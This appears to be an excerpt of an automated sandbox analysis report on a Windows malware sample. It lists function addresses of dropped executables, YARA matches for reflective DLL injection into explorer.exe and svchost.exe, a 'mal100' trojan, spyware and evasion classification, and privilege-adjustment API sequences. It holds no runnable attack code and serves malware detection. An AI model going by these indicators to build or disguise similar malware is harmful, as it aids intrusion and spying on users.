Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF6900195FB	11_2_00007FF6900195FB
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690020E70	11_2_00007FF690020E70
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690034F10	11_2_00007FF690034F10
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690035728	11_2_00007FF690035728
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF69002FBD8	11_2_00007FF69002FBD8
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690021F30	11_2_00007FF690021F30
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690032F20	11_2_00007FF690032F20
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF69001979B	11_2_00007FF69001979B
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690019FCD	11_2_00007FF690019FCD
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690025040	11_2_00007FF690025040
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690021074	11_2_00007FF690021074
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF69002D880	11_2_00007FF69002D880
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF6900228C0	11_2_00007FF6900228C0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690035C74	16_2_00007FF690035C74
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690034F10	16_2_00007FF690034F10
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690011000	16_2_00007FF690011000
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF69003518C	16_2_00007FF69003518C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF6900291B0	16_2_00007FF6900291B0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF69002D200	16_2_00007FF69002D200
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690038A38	16_2_00007FF690038A38
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690020A60	16_2_00007FF690020A60
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690021280	16_2_00007FF690021280
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690027AAC	16_2_00007FF690027AAC
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690018B20	16_2_00007FF690018B20
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690030B84	16_2_00007FF690030B84
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF6900333BC	16_2_00007FF6900333BC
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF6900273F4	16_2_00007FF6900273F4
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF69002FBD8	16_2_00007FF69002FBD8
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690020C64	16_2_00007FF690020C64
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690021484	16_2_00007FF690021484
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690022CC4	16_2_00007FF690022CC4
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF69002CD6C	16_2_00007FF69002CD6C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF6900195FB	16_2_00007FF6900195FB
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690020E70	16_2_00007FF690020E70
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690035728	16_2_00007FF690035728
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF69002FBD8	16_2_00007FF69002FBD8
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690021F30	16_2_00007FF690021F30
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690032F20	16_2_00007FF690032F20
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF69001979B	16_2_00007FF69001979B
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690019FCD	16_2_00007FF690019FCD
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690025040	16_2_00007FF690025040
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690021074	16_2_00007FF690021074
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF69002D880	16_2_00007FF69002D880
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF6900228C0	16_2_00007FF6900228C0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8372A68	16_2_00007FF8B8372A68
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B831DAC0	16_2_00007FF8B831DAC0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8305B5C	16_2_00007FF8B8305B5C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B830FBE0	16_2_00007FF8B830FBE0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8372C48	16_2_00007FF8B8372C48
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8367BFC	16_2_00007FF8B8367BFC
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B83A5E64	16_2_00007FF8B83A5E64
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B83A8DF8	16_2_00007FF8B83A8DF8
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8330E15	16_2_00007FF8B8330E15
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B830FF60	16_2_00007FF8B830FF60
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8302FA0	16_2_00007FF8B8302FA0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B832F000	16_2_00007FF8B832F000
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B830D030	16_2_00007FF8B830D030
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B83900BC	16_2_00007FF8B83900BC
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B831D120	16_2_00007FF8B831D120
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8303274	16_2_00007FF8B8303274
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8321200	16_2_00007FF8B8321200
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B83262D0	16_2_00007FF8B83262D0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B830C360	16_2_00007FF8B830C360
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8310300	16_2_00007FF8B8310300
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8308310	16_2_00007FF8B8308310
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B830233C	16_2_00007FF8B830233C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8322384	16_2_00007FF8B8322384
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B832C429	16_2_00007FF8B832C429
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B830F520	16_2_00007FF8B830F520
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B831F5A4	16_2_00007FF8B831F5A4
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B83116D0	16_2_00007FF8B83116D0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8342740	16_2_00007FF8B8342740
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B83026F8	16_2_00007FF8B83026F8
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8308854	16_2_00007FF8B8308854
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B83128B0	16_2_00007FF8B83128B0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB63CF0	16_2_00007FF8BFB63CF0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB637B0	16_2_00007FF8BFB637B0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB61A80	16_2_00007FF8BFB61A80
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB6521C	16_2_00007FF8BFB6521C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB62630	16_2_00007FF8BFB62630
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB61A80	16_2_00007FF8BFB61A80
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB63140	16_2_00007FF8BFB63140
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB62D30	16_2_00007FF8BFB62D30
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB76AE4	16_2_00007FF8BFB76AE4
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB72DD0	16_2_00007FF8BFB72DD0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB971CC	16_2_00007FF8BFB971CC
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB9D130	16_2_00007FF8BFB9D130
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Code function: 17_2_00F0DC74	17_2_00F0DC74
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006961F0	18_2_006961F0
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006D63C4	18_2_006D63C4
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006D64E4	18_2_006D64E4
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006D4737	18_2_006D4737
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006CCDCD	18_2_006CCDCD
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_00694EF0	18_2_00694EF0
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006951A0	18_2_006951A0
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006C3310	18_2_006C3310
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_00695450	18_2_00695450
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006CD559	18_2_006CD559
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006BBBB0	18_2_006BBBB0
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006BFDCB	18_2_006BFDCB
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006D1FC7	18_2_006D1FC7
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007AB700	19_2_007AB700
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007A61F0	19_2_007A61F0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007A51A0	19_2_007A51A0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007D3310	19_2_007D3310
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007E63C4	19_2_007E63C4
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007A5450	19_2_007A5450
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007E64E4	19_2_007E64E4
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007DD559	19_2_007DD559
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007E4737	19_2_007E4737
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007CBBB0	19_2_007CBBB0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007DCDCD	19_2_007DCDCD
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007CFDCB	19_2_007CFDCB
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007A4EF0	19_2_007A4EF0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007E1FC7	19_2_007E1FC7
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007A61F0	20_2_007A61F0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007B2B80	20_2_007B2B80
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007AB700	20_2_007AB700
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007E63C4	20_2_007E63C4
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007E64E4	20_2_007E64E4
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007E4737	20_2_007E4737
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007A4EF0	20_2_007A4EF0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007A51A0	20_2_007A51A0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007D3310	20_2_007D3310
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007A5450	20_2_007A5450
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007DD559	20_2_007DD559
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007CBBB0	20_2_007CBBB0
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007CFDCB	20_2_007CFDCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 29_2_697131B0	29_2_697131B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 29_2_69721AB1	29_2_69721AB1

Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: String function: 006B4640 appears 136 times
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: String function: 006BAC60 appears 56 times
Source: C:\Windows\System32\svchost.exe	Code function: String function: 00007FF7E52B1050 appears 106 times
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: String function: 00007FF690012760 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: String function: 00007FF6900125F0 appears 100 times
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 007D2B28 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 007CAC60 appears 112 times
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 007C4640 appears 272 times
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 007CA414 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 007D8B3C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: String function: 007C3730 appears 54 times
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Code function: String function: 00007FF6743D1050 appears 106 times
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Code function: String function: 00007FF79E381050 appears 106 times
Source: C:\Windows\System32\msiexec.exe	Code function: String function: 00007FF7179D1050 appears 106 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 69715D90 appears 103 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 697173B0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 69716B05 appears 47 times
Source: C:\Windows\System32\audiodg.exe	Code function: String function: 00007FF7A91B1050 appears 106 times

Source: api-ms-win-core-localization-l1-2-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.11.dr	Static PE information: No import functions for PE file found

Source: yINR7uQlPr.exe	Binary or memory string: OriginalFilename vs yINR7uQlPr.exe
Source: yINR7uQlPr.exe, 00000000.00000003.2045354787.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameServices.exe2 vs yINR7uQlPr.exe
Source: yINR7uQlPr.exe, 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameServices.exe2 vs yINR7uQlPr.exe
Source: yINR7uQlPr.exe, 00000000.00000003.2045212282.0000000002B40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameServices.exe2 vs yINR7uQlPr.exe
Source: yINR7uQlPr.exe, 00000000.00000003.2045283646.0000000002B90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameServices.exe2 vs yINR7uQlPr.exe

Source: 4.0.explorer.exe.3320000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.17002c7d000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.0.explorer.exe.3320000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.9820000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.3320000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.3320000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.9820000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.ca78220.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.17002c7d000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.2.explorer.exe.ca78220.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000000.2048399392.0000000003320000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000001.00000002.3377839465.0000017002C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@76/87@0/2

Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe

Code function: 11_2_00007FF6900129E0 GetLastError,FormatMessageW,MessageBoxW,

11_2_00007FF6900129E0

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Code function: 0_2_00007FF79E384264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,	0_2_00007FF79E384264
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Code function: 0_2_00007FF79E3840E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	0_2_00007FF79E3840E4
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_00007FF7E52B4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,	1_2_00007FF7E52B4264
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_00007FF7E52B40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	1_2_00007FF7E52B40E4
Source: C:\Windows\explorer.exe	Code function: 4_2_09823270 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	4_2_09823270
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Code function: 6_2_00007FF6743D4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,	6_2_00007FF6743D4264
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Code function: 6_2_00007FF6743D40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	6_2_00007FF6743D40E4
Source: C:\Windows\System32\audiodg.exe	Code function: 8_2_00007FF7A91B4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,	8_2_00007FF7A91B4264
Source: C:\Windows\System32\audiodg.exe	Code function: 8_2_00007FF7A91B40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	8_2_00007FF7A91B40E4
Source: C:\Windows\System32\msiexec.exe	Code function: 9_2_00007FF7179D4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,	9_2_00007FF7179D4264
